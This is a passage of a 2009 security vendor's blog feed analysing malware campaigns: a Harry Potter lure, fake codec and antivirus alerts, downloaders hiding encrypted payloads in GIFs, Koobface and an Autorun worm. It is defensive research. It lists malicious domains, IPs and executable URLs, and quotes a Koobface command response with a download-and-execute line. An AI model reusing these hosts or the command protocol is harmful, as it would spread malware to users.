See an example of the blog post here:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/SjqHRXMgONI/AAAAAAAAA3Q/kETkBErUgRc/s1600-h/SEO_HarryPotter.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 295px; height: 320px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/SjqHRXMgONI/AAAAAAAAA3Q/kETkBErUgRc/s320/SEO_HarryPotter.png" alt="" id="BLOGGER_PHOTO_ID_5348736239809870034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Clicking on any one of these links on the blog post redirects the user to the standard phony video offer:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/SjqHlTzesJI/AAAAAAAAA3Y/ZOed7nGLUGw/s1600-h/streamviewer_forHarryPotter.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 252px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/SjqHlTzesJI/AAAAAAAAA3Y/ZOed7nGLUGw/s320/streamviewer_forHarryPotter.png" alt="" id="BLOGGER_PHOTO_ID_5348736582496989330" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It is here that the user is prompted to download and install the additional "streamviewer" malicious downloader component from exe-center .com at 64.20.38.171, which we have been &lt;a href="http://blog.threatfire.com/2009/06/streamviewers-gif-images-embedded-with.html" target="_blank"&gt;monitoring&lt;/a&gt;. This phony viewer is really a downloader component that has been installing all sorts of malware, changing its selection of malware on a daily basis: Koobface (the digg user most likely is into social networking), adware, scareware, click fraud components, spambots, spyware and more. 
Missing out on an early peek at Harry Potter is then the least of the user's worries.&lt;br /&gt;&lt;br /&gt;This theme predictably will be used over p2p networks and other vectors of delivery in the coming weeks. Stay tuned.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-8302462810435987831?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/paCvm4kW_-E" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/8302462810435987831/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=8302462810435987831" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8302462810435987831" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8302462810435987831" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/paCvm4kW_-E/wanna-see-harry-potter-and-half-blood.html" title="Wanna See Harry Potter and the Half-Blood Prince?" 
/><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_YaXoRZbsXc4/SjqGVKV-_iI/AAAAAAAAA3I/Ks4VSQxN_tU/s72-c/digg_link.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/06/wanna-see-harry-potter-and-half-blood.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-1726506962411748821</id><published>2009-06-17T16:30:00.000-07:00</published><updated>2009-06-17T16:43:39.536-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">Warning! The media system on your computer is corrupt.</title><content type="html">No, probably not. This fake alert most likely has to do with the streamviewer exe that you downloaded and ran.&lt;br /&gt;&lt;br /&gt;We've &lt;a href="http://blog.threatfire.com/2009/06/streamviewers-gif-images-embedded-with.html" target="_blank"&gt;been monitoring&lt;/a&gt; a FakeAv/Koobface/spyware delivery scheme, and today the group dropped their standard FakeAv moneymaker and added a set of phony codec gimmickry to their bag of tricks, redirecting the user's browser to v-s-codecpro.com/purchase.php?code=, all while popping scareware messages about corrupt sound and video codecs. 
See the prompt in the lower right-hand corner here:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_YaXoRZbsXc4/Sjl9_arSQmI/AAAAAAAAA3A/82WPHRfRbD0/s1600-h/Warning.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 252px;" src="http://3.bp.blogspot.com/_YaXoRZbsXc4/Sjl9_arSQmI/AAAAAAAAA3A/82WPHRfRbD0/s320/Warning.png" alt="" id="BLOGGER_PHOTO_ID_5348444560925278818" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The codecs on your system are most likely not corrupted; they were not corrupted on our infected lab system.</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/1726506962411748821/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=1726506962411748821" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/1726506962411748821" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/1726506962411748821" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/iQumuEumBTM/warning-media-system-on-your-computer.html" title="Warning! The media system on your computer is corrupt." 
/><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_YaXoRZbsXc4/Sjl9_arSQmI/AAAAAAAAA3A/82WPHRfRbD0/s72-c/Warning.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/06/warning-media-system-on-your-computer.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-6969832236822946289</id><published>2009-06-16T09:15:00.000-07:00</published><updated>2009-06-17T08:40:06.487-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Obfuscation" /><category scheme="http://www.blogger.com/atom/ns#" term="Reversing" /><category scheme="http://www.blogger.com/atom/ns#" term="Evasion technique" /><category scheme="http://www.blogger.com/atom/ns#" term="Embedded trojan" /><title type="text">Streamviewer's .gif Images Embedded with Encrypted Malware</title><content type="html">Our &lt;a href="http://blog.threatfire.com/2009/06/softwarefortubeview-moves-to-new-home.html" target="_blank"&gt;post&lt;/a&gt; last week warned of a group moving their FakeAv-Koobface-Vundo-Spyware "softwarefortubeview" phony codec downloader to a new home. This week we are examining a similar scheme that downloads, surprise, surprise, Koobface and FakeAv-prompting BHOs like iehelper.dll (which prompts for "Antivirus system PRO"), performs some level of click fraud, and installs podmena.dll and podmena.sys. This one also includes a nice FTP credential stealing component, stealing passwords from FileZilla, Coffee Cup, FTP Control, CuteFtp and more.&lt;br /&gt;&lt;br /&gt;Streamviewer.40050.exe (and other streamviewer + random version names) 
has been flying off the shelf at a server on 64.20.38.171. That IP hosts multiple badware domains:&lt;br /&gt;go-exe-go.com&lt;br /&gt;reverse38-170.reserver.ru&lt;br /&gt;gruzzilla.com&lt;br /&gt;hot-exe-area.com&lt;br /&gt;last-exe-portal.com&lt;br /&gt;main-exe-home.com&lt;br /&gt;super-exe-home.com&lt;br /&gt;&lt;br /&gt;What is interesting about the downloader is the way in which additional malware is downloaded and dropped by this phony codec. It contacts a set of servers with encoded data about the system.&lt;br /&gt;reportsystem32.com  (216.240.146.119)&lt;br /&gt;terradataweb.com  (66.199.229.229)&lt;br /&gt;dvdisorapid.com  (64.27.5.202)&lt;br /&gt;superimagesart.com  (95.211.8.61)&lt;br /&gt;thenewpic.com  (66.148.80.4)&lt;br /&gt;&lt;br /&gt;It then pulls out data from a decoded XML file containing a list of URLs to contact for a variety of .gif images (titem.gif, qwerce.gif, 217.gif, etc.).&lt;br /&gt;superimagesart.com&lt;br /&gt;thenewpic.com&lt;br /&gt;stockshopimages.com&lt;br /&gt;imagesoffline.com&lt;br /&gt;theimagesphoto.com&lt;br /&gt;imageheadphones.com&lt;br /&gt;&lt;br /&gt;At the time of download, GIF viewers will display titem.gif with a political message about French politician Christine Boutin:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/SjfzGHimxwI/AAAAAAAAA24/GP9nW_h1Ey8/s1600-h/DEVENEZSEROPO_2.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 176px; height: 102px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/SjfzGHimxwI/AAAAAAAAA24/GP9nW_h1Ey8/s320/DEVENEZSEROPO_2.png" alt="" id="BLOGGER_PHOTO_ID_5348010368954713858" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Know that we do not endorse any political message with this post. But this gif image is no ordinary image. If it were, its size might reach 35 kb at the most. 
Embedded in the image is the encrypted payload, bloating the image out to a couple hundred kilobytes (~270 kb).&lt;br /&gt;The downloader gathers the response information from the previous sites to find more URLs to contact and its decryption key. It then uses that key to decrypt the code embedded within the downloaded GIFs.&lt;br /&gt;&lt;br /&gt;Much like the recent (and possibly related) beladen downloader and the older Tibs downloaders, this embedded-image malware delivery scheme attempts to evade gateway-appliance-based protection and optimized AV scans with GIF-based encrypted payloads. It also stymies automated web-crawling-based research efforts. No longer are we seeing simple XOR decoding schemes with visible PE headers in downloaded image files. The encryption implemented for this attack was another previously commercial and proprietary encryption algorithm.&lt;br /&gt;ThreatFire is preventing this downloader at fairly high prevalence.</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/6969832236822946289/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=6969832236822946289" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/6969832236822946289" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/6969832236822946289" /><link rel="alternate" type="text/html" 
href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/DFhFAsOFSJE/streamviewers-gif-images-embedded-with.html" title="Streamviewer's .gif Images Embedded with Encrypted Malware" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_YaXoRZbsXc4/SjfzGHimxwI/AAAAAAAAA24/GP9nW_h1Ey8/s72-c/DEVENEZSEROPO_2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/06/streamviewers-gif-images-embedded-with.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-7105482659694781940</id><published>2009-06-10T09:18:00.000-07:00</published><updated>2009-06-10T12:58:09.301-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Vulnerability" /><title type="text">Patch Tuesday</title><content type="html">It is Patch Tuesday and Microsoft posted another &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx" target="_blank"&gt;ten bulletins&lt;/a&gt; for their Windows platform and Office applications -- be sure to update; six of the ten are rated "critical" or "pwn me". Four of the patches address holes in client-side targets like Internet Explorer, Word, Excel, and a Works converter. 
Visiting the site results in over 30 high-priority patch installs for many systems.&lt;br /&gt;Where do you want to go today -- head on over to the &lt;a href="http://update.microsoft.com/" target="_blank"&gt;Microsoft update site&lt;/a&gt;.</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/7105482659694781940/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=7105482659694781940" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/7105482659694781940" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/7105482659694781940" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/djxteGTp_4w/patch-tuesday.html" title="Patch Tuesday" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/06/patch-tuesday.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-7395063994604786527</id><published>2009-06-03T10:12:00.001-07:00</published><updated>2009-06-09T17:43:49.494-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Rogueware" 
/><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">Softwarefortubeview Moves to a New Home at 65.110.50.141</title><content type="html">We &lt;a href="http://blog.threatfire.com/2009/05/softwarefortubeview-codec-schemes.html" target="_blank"&gt;posted a couple of weeks ago&lt;/a&gt; on the continued success of a group in distributing FakeAv/Rogueware/Scareware.&lt;br /&gt;&lt;br /&gt;Please note that their downloaders have been moved to a new home at 65.110.50.141. There are multiple domains currently resolving to that IP, which is managed by "Sago Networks". One we know of currently serving softwarefortubeview.40019.exe executables is wile-exe.com. The move appears to have happened on June 1st. Avoid executables from that domain for now.&lt;br /&gt;&lt;br /&gt;The downloads appear to be committing some sort of click fraud, although they have been known to pop fake alerts to move FakeAv software; see &lt;a href="http://www.threatexpert.com/report.aspx?md5=8d446a10f1aa0957ab33072e895b8a36"&gt;here&lt;/a&gt;, &lt;a href="http://www.threatexpert.com/report.aspx?md5=416230afd65279ad701e461c2dbab909"&gt;here&lt;/a&gt; and &lt;a href="http://www.threatexpert.com/report.aspx?md5=f8deecfbe48bedb5549658cfdd0de588" target="_blank"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Update (2009.06.09) -- we are following the downloaders, and the group moved to another couple of IPs yesterday (2009.06.08), this time 66.197.171.9 and 66.197.171.6. For example, you can find the malware at my-exe-profile. com/softwarefortubeview.45084.exe. The server virtually hosts an array of content, including "Download Now!" links that redirect to paid mp3 services, fetish videos, and more malware.&lt;br /&gt;Also related is my-exe-profile. com/ av-scanner.48047.exe. However, this dropper/downloader lays out a couple of click-fraud trojans, visiting a long list of banner ads and ad sites from the compromised host. 
A &lt;a href="http://www.threatexpert.com/report.aspx?md5=63ff1562893dfa315546488acf5c376e" target="_blank"&gt;Vundo&lt;/a&gt; variant is installed. An unusually packed Koobface variant is dropped on the machine. Another &lt;a href="http://www.threatexpert.com/report.aspx?md5=8d70f8ef119dcaf361a71c3c8e1495e3" target="_blank"&gt;iehelper.dll&lt;/a&gt; BHO component pops a screenful of AntiVirus System PRO, or SWP2009Pro, and a dialog "There are serious threats detected on your computer" and another bogus "Windows Security Alert" reporting "Windows reports that your computer is infected".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_YaXoRZbsXc4/Si7j4vOUm1I/AAAAAAAAA2g/UVZjqWhD2cQ/s1600-h/AntivirusSystemPRO.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 225px;" src="http://3.bp.blogspot.com/_YaXoRZbsXc4/Si7j4vOUm1I/AAAAAAAAA2g/UVZjqWhD2cQ/s320/AntivirusSystemPRO.png" alt="" id="BLOGGER_PHOTO_ID_5345460371624074066" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The final, and fairly new, piece is that it downloads &lt;a href="http://www.threatexpert.com/report.aspx?md5=fb0da2ada35fa4547c75b3740c35a40e" target="_blank"&gt;pdrv.exe&lt;/a&gt; from evidek.ro. 
The "download and exec" command for this executable is sent down from a Koobface related channel, while more bogus alerts are popping on the system:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_YaXoRZbsXc4/Si7rL7OhDzI/AAAAAAAAA2o/-gsS13y0jL0/s1600-h/SpywareAlert.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 228px;" src="http://1.bp.blogspot.com/_YaXoRZbsXc4/Si7rL7OhDzI/AAAAAAAAA2o/-gsS13y0jL0/s320/SpywareAlert.png" alt="" id="BLOGGER_PHOTO_ID_5345468397845024562" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Partially mangled &lt;a href="http://www.threatexpert.com/report.aspx?md5=e65e0ac8e2046164fe67e9af494bd511" target="_blank"&gt;Koobface post and response&lt;/a&gt; are listed here:&lt;br /&gt;&lt;br /&gt;POST /ld/gen.php&lt;br /&gt;HTTP/1.0&lt;br /&gt;Host: upr15may.com&lt;br /&gt;f=0&amp;amp;a=1956647682&amp;amp;v=09&amp;amp;c=0&amp;amp;s=ld&amp;amp;l=71140&amp;amp;ck=0&amp;amp;c_fb=0&amp;amp;c_ms=0&amp;amp;c_hi=0&amp;amp;c_be=0&amp;amp;c_fr=-1&amp;amp;c_yb=-1&amp;amp;c_tg=0&amp;amp;c_nl=0&amp;amp;c_fu=-1HTTP/1.1&lt;br /&gt;&lt;br /&gt;#PID=8000&lt;br /&gt;STARTONCE|hxxp://evidek. ro/1/pdrv.exe&lt;br /&gt;WAIT|120&lt;br /&gt;#BLACKLABEL&lt;br /&gt;EXIT&lt;br /&gt;&lt;br /&gt;This dropper creates&lt;br /&gt;%ProgramFiles%\podmena\podmena.dll&lt;br /&gt;%ProgramFiles%\podmena\podmena.sys&lt;br /&gt;for which there is virtually no AV detection at this time. 
As always, don't forget your &lt;a href="http://www.threatfire.com/" target="_blank"&gt;behavioral-based protection&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The podmena.sys driver is interesting -- it attaches to the tcpip device driver and appears to intercept network traffic coming to and going from the system.</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/7395063994604786527/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=7395063994604786527" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/7395063994604786527" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/7395063994604786527" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/tyRQjUkfVUU/softwarefortubeview-moves-to-new-home.html" title="Softwarefortubeview Moves to a New Home at 65.110.50.141" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_YaXoRZbsXc4/Si7j4vOUm1I/AAAAAAAAA2g/UVZjqWhD2cQ/s72-c/AntivirusSystemPRO.png" height="72" width="72" /><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/06/softwarefortubeview-moves-to-new-home.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-590423919744636609</id><published>2009-06-02T14:20:00.000-07:00</published><updated>2009-06-02T15:28:06.659-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Autorun" /><category scheme="http://www.blogger.com/atom/ns#" term="Worm" /><category scheme="http://www.blogger.com/atom/ns#" term="Rogueware" /><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">Undetected Autorun/Injector Variant on the Loose</title><content type="html">A new variant of an Autorun worm is on the loose, probably created by another childish and angry ex-lover. The little multithreaded beast injects into Windows Explorer, and attempts to communicate with one of several IRC servers at June.IRCdevils.net, June.helldark.biz, and June.a7aneek.net with a "VirUS/Virus" user/pass and a "VirUS-randstring" nick.&lt;br /&gt;&lt;br /&gt;We noticed it this morning on multiple machines, and it seems to be spreading. The worm injects itself into the Windows Explorer shell, and from there attempts to update multiple locations in the registry and removable drives like USB sticks with SETUP\DATA\June.exe.&lt;br /&gt;It includes a nasty message in the accompanying autorun.inf file with a long annoying string.&lt;br /&gt;;HEHhahahahehhehehahahahhehehehaha&lt;br /&gt;&lt;br /&gt;It was packed with Armadillo, which potentially made it difficult for the AV vendors to detect -- none detected it this morning, and this afternoon seems to bring only one or two vendors declaring it "suspicious" since we uploaded it to VirusTotal for sharing. 
Be sure to add true client-side behavioral protection to your system, and as always, use caution when sharing USB sticks with others.&lt;br /&gt;&lt;br /&gt;We are seeing it running on systems alongside FakeAv installers, including "System Security", where we see the fake scare tactics blaring "WARNING! 38 infections found!!!". The two may be related; we are investigating.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/SiWe7_ftBfI/AAAAAAAAA2Q/NhrrIIuv8mM/s1600-h/SystemSecurity.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 217px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/SiWe7_ftBfI/AAAAAAAAA2Q/NhrrIIuv8mM/s320/SystemSecurity.png" alt="" id="BLOGGER_PHOTO_ID_5342851286438839794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Which, of course, continues to nag the user with "System Security Firewall has blocked a program from accessing the internet" and pops its nag system tray balloon with "System Security Warning Your PC is still infected with dangerous viruses".&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/SiWnQDq4mEI/AAAAAAAAA2Y/EN_h0_1uCrw/s1600-h/SystemSecurityWarning.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 308px; height: 320px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/SiWnQDq4mEI/AAAAAAAAA2Y/EN_h0_1uCrw/s320/SystemSecurityWarning.png" alt="" id="BLOGGER_PHOTO_ID_5342860427249883202" border="0" /&gt;&lt;/a&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/590423919744636609/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=590423919744636609" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/590423919744636609" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/590423919744636609" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/FCR_qlQ80tQ/undetected-autoruninjector-variant-on.html" title="Undetected Autorun/Injector Variant on the Loose" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_YaXoRZbsXc4/SiWe7_ftBfI/AAAAAAAAA2Q/NhrrIIuv8mM/s72-c/SystemSecurity.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/06/undetected-autoruninjector-variant-on.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-1677042514998091840</id><published>2009-05-29T10:37:00.000-07:00</published><updated>2009-05-29T11:36:23.433-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Government and Cybersecurity" /><title type="text">Cyberspace Policy Review</title><content type="html">If you're looking for the 60-page cybersecurity policy review that President Barack Obama discussed this morning, you can find it &lt;a 
href="http://www.whitehouse.gov/assets/documents/Cyberspace_Policy_Review_final.pdf" target="_blank"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Considering that AlephOne's article on "Smashing the Stack for Fun and Profit" was released in 1996, Iloveyou in 2000, CodeRed in 2001, the Slammer worm in 2003, the Witty worm event in 2004, the thousands of system intrusions and compromises since (reported and unreported), and &lt;a href="http://en.wikipedia.org/wiki/Timeline_of_computer_viruses_and_worms" target="_blank"&gt;the list goes on&lt;/a&gt;, the review seems around fifteen years late on delivery. But better late than never. It addresses badly needed subjects and planning in thoughtful and creative ways.&lt;br /&gt;&lt;br /&gt;Some of the document is predictably clumsy. Chapter IV, "Creating Effective Information Sharing and Incident Response", oddly starts out with a current example of Downadup/Conficker as impetus for action: "For example, despite advance warning and instructions on how networks could be protected, had the “Conficker [&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2008-112203-2408-99" target="_blank"&gt;Downadup&lt;/a&gt;]” worm activated on April 1, 2009 with a malicious payload, some federal departments and agencies were not prepared to respond". What malicious payload? Unprepared in what way? To infected machines within the federal and state governments? To a DDoS attack from the majority of Downadup-infected systems across the ocean that actually were infected (and most just wound up with a FakeAv download)? Don't leave me hanging, folks, what were they unprepared for?&lt;br /&gt;&lt;br /&gt;Of note, some of the law enforcement agencies in attendance at the presentation have field offices with agents that don't know what a URL is (which is much like reporting something to a police officer and hearing them respond "Sorry, I don't know what a street address is, please tell someone else"). 
Based on that level of techno-savvy, the section on cyber-education is much needed, overdue, and significant: "Building Capacity for a Digital Nation".&lt;br /&gt;&lt;br /&gt;It's a good read, especially the section addressing internationally co-ordinated efforts, "Partner Effectively With the International Community".&lt;br /&gt;&lt;br /&gt;Cheers to open dialog about cyber-security challenges!</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/1677042514998091840/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=1677042514998091840" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/1677042514998091840" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/1677042514998091840" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/9J6momgwRS8/cyberspace-policy-review.html" title="Cyberspace Policy Review" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/05/cyberspace-policy-review.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-8203648336796177620</id><published>2009-05-26T15:46:00.000-07:00</published><updated>2009-06-02T17:00:54.800-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Rootkit" /><category scheme="http://www.blogger.com/atom/ns#" term="Adware" /><category scheme="http://www.blogger.com/atom/ns#" term="Koobface" /><category scheme="http://www.blogger.com/atom/ns#" term="Spam" /><category scheme="http://www.blogger.com/atom/ns#" term="Virut" /><title type="text">Virut Distributing Koobface, Ad-Clickers and Spambots</title><content type="html">Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) to prevent the new variants on users' systems even when the traditional AV scanners have failed to keep up.&lt;br /&gt;&lt;br /&gt;Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.&lt;br /&gt;&lt;br /&gt;The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, HTML file appending, and hooking techniques. But what is the group behind it up to now?&lt;br /&gt;This summary will put together a few more key points on the threat's current activity and its hosts. 
